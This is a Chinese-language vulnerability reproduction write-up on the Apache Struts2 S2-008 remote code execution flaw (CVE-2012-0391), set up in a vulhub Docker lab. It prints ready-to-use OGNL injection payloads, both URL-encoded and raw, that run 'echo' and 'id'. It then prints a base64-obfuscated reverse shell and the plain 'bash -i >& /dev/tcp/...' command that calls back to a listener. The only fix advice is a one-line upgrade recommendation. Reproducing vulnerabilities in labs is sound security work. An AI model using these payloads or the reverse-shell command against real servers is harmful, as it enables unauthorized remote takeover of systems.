2023年1月3日12:20:27评论118 views字数 2608阅读8分41秒阅读模式

1 漏洞信息

漏洞名称	远程代码执行漏洞
漏洞编号	CVE-2012-0391
危害等级	高危
漏洞类型	中间件漏洞
漏洞厂商	Apache
漏洞组件	Struts2
受影响版本	2.1.0 <= Struts2 <= 2.3.1
漏洞概述	主要是利用对传入参数没有严格限制，导致多个地方可以执行恶意代码，传入?debug=command&expression=即可执行OGNL表达式

2 环境搭建

2.1 环境概述

Linux操作系统

2.2 搭建过程

拉取镜像

cd vulhub/struts2/s2-008docker-compose up -d

访问http://192.168.146.158:8008/devmode.action

【漏洞复现】S2-008 远程代码执行漏洞(CVE-2012-0391)

3 漏洞复现

构造一个恶意的payload并发送。

debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecution"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27echo+has+vul%27%29.getInputStream%28%29%29)

payload原型：debug=command&expression=(#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo has vul').getInputStream()))

发现成功执行了echo has vul，说明存在该漏洞。

【漏洞复现】S2-008 远程代码执行漏洞(CVE-2012-0391)

既然发现漏洞了，那我们可以构造一个payload，执行id命令。

debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecution"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29)

payload原型：debug=command&expression=(#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))

成功执行了id命令。

【漏洞复现】S2-008 远程代码执行漏洞(CVE-2012-0391)

接下来开始反弹shell

bash -i >& /dev/tcp/192.168.146.158/9999 0>&1

访问漏洞url并且添加恶意payload进行抓包。

debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecution"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29.getInputStream%28%29%29)

payload原型：debug=command&expression=(#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream()))

攻击机进行监听，然后发现成功反弹了shell。

【漏洞复现】S2-008 远程代码执行漏洞(CVE-2012-0391)

4 修复建议

1、推荐的解决方案：升级至比受漏洞影响的更高版本。

- End -

原文始发于微信公众号（NS Demon团队）：【漏洞复现】S2-008 远程代码执行漏洞(CVE-2012-0391)

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】S2-008 远程代码执行漏洞(CVE-2012-0391)

1 漏洞信息

2 环境搭建

2.1 环境概述

2.2 搭建过程

3 漏洞复现

4 修复建议

探索通过GPT和云平台搭建网安实战培训环境

脆弱的海底光缆——当下网络基础设施安全缩影

数安e站 | 什么是数据脱敏？

CVE-2024-3094 从xz backdoor 中我们可以学到什么之脚本分析部分

蚂蚁牵头的大模型安全测评标准发布

CSA大中华区牵头 | 生成式AI应用安全、大模型安全标准发布

宏景任意文件读取漏洞分析

供应链后门检测方式以xz xz-utils为例（CVE-2024-3094）

【复现】kkFileView远程代码执行漏洞的风险通告

漏洞挖掘 | 一次很惊讶的密码重置漏洞

发表评论

在线咨询

微信